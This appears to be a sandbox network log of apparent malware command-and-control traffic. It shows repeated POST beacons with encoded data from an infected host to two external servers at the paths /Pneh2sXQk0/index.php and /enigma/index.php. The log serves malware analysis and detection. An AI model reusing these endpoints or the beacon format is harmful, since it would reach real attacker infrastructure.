                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1326 | 192.168.2.5 | 51180 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:04.232568979 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:04.480467081 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1327 | 192.168.2.5 | 51181 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:04.354208946 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:04.599560022 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1328 | 192.168.2.5 | 51182 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:04.815279961 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:05.059890985 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1329 | 192.168.2.5 | 51183 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:04.941760063 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:05.185753107 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1330 | 192.168.2.5 | 51184 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:05.314809084 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:05.571484089 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1331 | 192.168.2.5 | 51185 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:05.439419985 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:05.692621946 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1332 | 192.168.2.5 | 51186 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:05.910593033 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:06.157146931 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1333 | 192.168.2.5 | 51187 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:06.038501024 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:06.285661936 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1334 | 192.168.2.5 | 51188 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:06.411046028 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:06.666073084 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1335 | 192.168.2.5 | 51189 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:06.539952993 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:06.795605898 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1336 | 192.168.2.5 | 51190 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:07.005722046 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:07.249983072 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1337 | 192.168.2.5 | 51191 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:07.149180889 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:07.396560907 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1338 | 192.168.2.5 | 51192 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:07.502878904 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:07.757133961 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1339 | 192.168.2.5 | 51193 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:07.646423101 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:07.896151066 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1340 | 192.168.2.5 | 51194 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:08.102880001 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:08.349529982 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1341 | 192.168.2.5 | 51195 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:08.238775015 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:08.479494095 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1342 | 192.168.2.5 | 51196 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:08.596739054 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:08.851206064 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1343        192.168.2.5  51197        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:08.724225998 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:08.970350981 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port
1344        192.168.2.5  51198        193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:09.177392006 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
